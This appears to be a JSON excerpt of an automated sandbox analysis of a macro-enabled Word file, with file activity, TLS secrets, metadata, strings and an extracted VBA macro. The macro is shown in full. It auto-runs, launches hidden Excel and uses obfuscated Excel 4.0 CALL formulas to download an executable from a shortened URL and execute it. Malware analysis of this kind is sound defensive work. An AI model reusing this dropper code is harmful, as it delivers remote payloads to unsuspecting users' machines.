"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTele.dat"
],
"write_files":[
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS{7218FB01-892D-48EE-B002-23733AED8C9D}.tmp",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTele.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\~$ckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTele.dat"
],
"file_failed":[
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Office\\adhoc.rcd",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\History",
"\\Device\\RasAcd",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Cookies",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Office\\review.rcd",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele",
"C:\\ProgramData\\Microsoft\\Network\\Connections\\Pbk\\",
"C:\\Users\\Administrator\\AppData\\Roaming",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Word\\cuckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9de308547150794943110\\",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cuckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"C:\\Users\\Administrator\\AppData\\Local",
"\\DEVICE\\NETBT_TCPIP_{3980F220-02D6-4AE5-9F61-3B1E7562F866}",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{8E73F01D-96DC-434D-90DE-6B19C6E513F5}.tmp",
"C:\\Users\\Administrator",
"\\DEVICE\\NETBT_TCPIP_{846EE342-7039-11DE-9D20-806E6F6E6963}",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files"
],
"tls_master":[
[
"5fd0e4ee4ce900b9bc9416005b61f7d8d4bcd4ae6d44088b19df9644926f1eb3",
"5fd0e4f530a96d98b1906323730bcf61ff6cfce1eb42522c3ff906d56f50313c",
"f00ba02a4a90443e1f7d4d4e952b384f2b55096525137a3aadc555169b2623fb825d4ce2136f5ca323419d160503a270"
],
[
"5fd0e4f372c53ff05a6b8bfa54f98da0ef9379e321565a98adfdd9ea62206942",
"5fd0e4fa29a895a91b4960ac699334b0ec5dbe05d62a4a24444f574e47524400",
"27b369d0dffa22875e711e58ac32d66fa0e8b0e3047a8f576209ccec7227aeb099436d3723799659f40b8635dec03923"
],
[
"5fd0e52ab029f2d9a88b026f94097e2d42ea3cfc26a84e2d0d71d83706957777",
"5fd0e531cbd87e24ad0035e809ce5dc08b257ba35104832d11d09e165ea498d7",
"e9a3aaa790a902bbbc1100c83579912895e3073800bab1c75d3c33396e3b7c6f395907d1c712b0430dc91572e1b02883"
],
[
"5fd0e4e74331377065dbf2d1f1e7580bb01bfa6fcd74b90cdf80ca67643f247b",
"5fd0e4ee09eb910780dde0588bceaf7a08be8e1f33d3312f444f574e47524400",
"c9d31455142a3b3e1caab573efd3a6f6cf0d51fc23d18fa31f3ec0c7eaba72c0e7fd1e33af1296f781a800bd5544a9c6"
],
[
"5fd0e4e8ef70c4d43eacfe1f9bdc4a2f1763b390a4c6860eba9a4ce88fd9feb2",
"5fd0e4ee8bf9477a3a1f1d5fd6b901a1021860f734bde647444f574e47524400",
"927203b3e377de96e549fe85b5a9739b587e17787cf5345a4153d489e83445163423223428670b9fddf3506a1cfaa3cb"
],
[
"5fd0e51eb8d71b124bb1cf48d5d2e796a549ce391db29789375ed296e36646e0",
"5fd0e525bef7110000a7c3fe193c14f8b7db4cc2941e217707f2b0a7aea6d2b0",
"4f4d55d3a3a19bce6448c4be0233389301a91259d98e8e2f674b7abe11fe1377c8aebf040930a16ab0d820138e4767f1"
],
[
"5fd0e4eba6ab7386448a707fb56ab8edce25f8af46a55ec7666897cce1f167df",
"5fd0e4f2c4af97c18eb7113613609c25e9143129dbeefc9382ea221e28ce50d4",
"21c201e8a67e72725c7aca6ce43656bdb7e923db2ac56ad108e83eb75e472698209306c4244fa4d9a1f16c4e3eabcd46"
]
],
"guid":[
"{275c23e2-3747-11d0-9fea-00aa003f8646}",
"{00000003-0000-0000-c000-000000000046}",
"{56fdf342-fd6d-11d0-958a-006097c9a090}",
"{00000304-0000-0000-c000-000000000046}",
"{44aca674-e8fc-11d0-a07c-00c04fb68820}",
"{3ce74de4-53d3-4d74-8b83-431b3828ba53}",
"{dccfc164-2b38-11d2-b7ec-00c04f8f5d9a}",
"{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}",
"{591209c7-767b-42b2-9fba-44ee4615f2c7}",
"{4e530b0a-e611-4c77-a3ac-9031d022281b}",
"{add8ba80-002b-11d0-8f0f-00c04fd7d062}",
"{a4b544a1-438d-4b41-9325-869523e2d6c7}",
"{dcb00c01-570f-4a9b-8d69-199fdba5723b}",
"{00024500-0000-0000-c000-000000000046}",
"{00000000-0000-0000-c000-000000000046}",
"{4590f811-1d3a-11d0-891f-00aa004b2e24}",
"{d0074ffd-570f-4a9b-8d69-199fdba5723b}",
"{00000303-0000-0000-c000-000000000046}",
"{674b6698-ee92-11d0-ad71-00c04fd8fdff}",
"{dffacdc5-679f-4156-8947-c5c76bc0b67f}",
"{d5f569d0-593b-101a-b569-08002b2dbf7a}",
"{4d7ff4ba-1565-4ea8-94e1-6e724a46f98d}",
"{33c53a50-f456-4884-b049-85fd643ecfed}",
"{dc12a687-737f-11cf-884d-00aa004b2e24}",
"{88d96a0f-f192-11d4-a65f-0040963251e5}",
"{56fdf344-fd6d-11d0-958a-006097c9a090}",
"{e7d35cfa-348b-485e-b524-252725d697ca}",
"{8ded7393-5db1-475c-9e71-a39111b0ff67}",
"{1f02b6c5-7842-4ee6-8a0b-9a24183a95ca}",
"{c3acefb5-f69d-4905-938f-fcadcf4be830}",
"{f309ad18-d86a-11d0-a075-00c04fb68820}",
"{dcb00000-570f-4a9b-8d69-199fdba5723b}",
"{aa80e801-2021-11d2-93e0-0060b067b86e}",
"{a47979d2-c419-11d9-a5b4-001185ad2b89}",
"{8bc3f05e-d86b-11d0-a075-00c04fb68820}"
]
}
}
},
"exiftool":{
"results":{
"ZIP:ZipBitFlag":"0x0006",
"ZIP:ZipCRC":"0x7cbe937c",
"ZIP:ZipCompressedSize":396,
"ZIP:ZipCompression":"Deflated",
"ZIP:ZipFileName":"[Content_Types].xml",
"ZIP:ZipModifyDate":"1980:01:01 00:00:00",
"ZIP:ZipRequiredVersion":20,
"ZIP:ZipUncompressedSize":1461,
"XMP:Creator":"Julian Incognito",
"XMP:Description":"",
"XMP:Subject":"",
"XMP:Title":"",
"XML:AppVersion":16.0,
"XML:Application":"Microsoft Office Word",
"XML:Characters":0,
"XML:CharactersWithSpaces":0,
"XML:Company":"",
"XML:CreateDate":"2020:11:30 16:01:00Z",
"XML:DocSecurity":"None",
"XML:HyperlinksChanged":"No",
"XML:Keywords":"",
"XML:LastModifiedBy":"Julian Incognito",
"XML:Lines":0,
"XML:LinksUpToDate":"No",
"XML:ModifyDate":"2020:11:30 16:03:00Z",
"XML:Pages":1,
"XML:Paragraphs":0,
"XML:RevisionNumber":2,
"XML:ScaleCrop":"No",
"XML:SharedDoc":"No",
"XML:Template":"iencli12.dotm",
"XML:TotalEditTime":"2 minutes",
"XML:Words":0
}
},
"strings":{
"results":[
"[Content_Types].xml ",
"_rels/.rels ",
"word/document.xml",
"word/_rels/document.xml.rels ",
"word/vbaProject.bin",
"\\xjBM=U",
"word/theme/theme1.xml",
"word/_rels/vbaProject.bin.relsl",
"-\\Ya;>>",
"word/vbaData.xml",
"word/settings.xml",
"word/styles.xml",
"u.Tv6:x",
"R{F$dNk>",
"Za?*Ljh3",
"word/webSettings.xml",
"word/fontTable.xml",
"docProps/core.xml ",
"docProps/app.xml ",
"[Content_Types].xmlPK",
"_rels/.relsPK",
"word/document.xmlPK",
"word/_rels/document.xml.relsPK",
"word/vbaProject.binPK",
"word/theme/theme1.xmlPK",
"word/_rels/vbaProject.bin.relsPK",
"word/vbaData.xmlPK",
"word/settings.xmlPK",
"word/styles.xmlPK",
"word/webSettings.xmlPK",
"word/fontTable.xmlPK",
"docProps/core.xmlPK",
"docProps/app.xmlPK"
]
},
"ooxml":{
"results":{
"content":"<div>\n <p/>\n</div>\n",
"properties":{
"title":null,
"subject":null,
"creator":"Julian Incognito",
"keywords":null,
"description":null,
"lastModifiedBy":"Julian Incognito",
"revision":"2",
"created":"2020-11-30T16:01:00Z",
"modified":"2020-11-30T16:03:00Z",
"Template":"iencli12.dotm",
"TotalTime":"2",
"Pages":"1",
"Words":"0",
"Characters":"0",
"Application":"Microsoft Office Word",
"DocSecurity":"0",
"Lines":"0",
"Paragraphs":"0",
"ScaleCrop":"false",
"Company":null,
"LinksUpToDate":"false",
"CharactersWithSpaces":"0",
"SharedDoc":"false",
"HyperlinksChanged":"false",
"AppVersion":"16.0000"
},
"sigtool":"-------------- start of code ------------------\nAttribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"0{00020906-0000-0000-C000-000000000046}\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = False\r\nAttribute VB_Customizable = True\r\nSub aUtOopEn()\r\n\r\n\r\n\r\nDim ExcelSheet As Object\r\nDim strMacro As String\r\n\r\nSet ExcelSheet = CreateObject(\"Excel.Application\")\r\nSet Workbook = ExcelSheet.workbooks.Add()\r\nSet Worksheets = ExcelSheet.Worksheets\r\n\r\nExcelSheet.DisplayAlerts = False\r\n\r\n\r\n\r\nWorksheets.Add Before:=Worksheets(1), Count:=1, Type:=4\r\n\r\nExcelSheet.Application.Visible = 0\r\n\r\nExcelSheet.Range(\"A1\").Name = \"hello\"\r\n\r\n\r\n\r\nExcelSheet.Range(\"A98\") = \"=ERROR(FALSE, (B100))\"\r\nExcelSheet.Application.Cells(108, 1).Value = \"=CALL(\"\"ur\"\"&CHAR(108)&\"\"mon\"\",\"\"UR\"\"&CHAR(76)&\"\"Down\"\"&CHAR(108)&\"\"oadToFi\"\"&CHAR(108)&\"\"eA\"\",\"\"JJCCJJ\"\",0,\"\"https://tinyurl.com/y54lptvl\"\",\"\"C:\\\"\" & Char(80) & Char(82) & \"\"OGRAMDATA\\a.\"\"&CHAR(101)&\"\"xe\"\",0,0)\"\r\n\r\nExcelSheet.Range(\"A109\") = \"=CALL(\"\"Shel\"\"&CHAR(108)&\"\"32\"\",\"\"Shel\"\"&CHAR(108)&\"\"ExecuteA\"\",\"\"JJCCJJ\"\",0,\"\"open\"\",\"\"C:\\\"\" & Char(80) & Char(82) & \"\"OGRAMDATA\\a.\"\"&CHAR(101)&\"\"xe\"\",0,0)\"\r\n\r\n\r\n\r\n\r\nExcelSheet.Sheets(1).Visible = 2\r\n\r\n\r\n\r\nletsgo = \"hello\"\r\nExcelSheet.Run (letsgo)\r\n\r\n\r\nSet ExcelSheet = Nothing\r\n\r\n\r\n\r\n\r\n\r\nEnd Sub\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\n-------------- end of code ------------------\n"
}
}
},
"datetime_int":"2020-12-09T14:53:04",
"info":{
"results":{
"filesize":16636,
"file_type":"Microsoft Word 2007+",
"md5":"aa37daeedf69b6d26081c1d6ae5a19c3",
"sha1":"b553641092e1a15e70f1229cb9ada0a47132f054",
"sha256":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"ssdeep":"192:HNmtT7KlBpGK6SICieyOA8MS48TuX63hOZ73Ea5l/aZTbYh7e++9dQEwPwS7mZNq:tmtvKBvnpDALoa5lahYY+ISJkm",
"file_class":"OOXML"
}
},
"has_dynamic":true,
"has_S3":true,
"analysis_time":125
},
"page_type":"OOXML",
"malware":{
}
}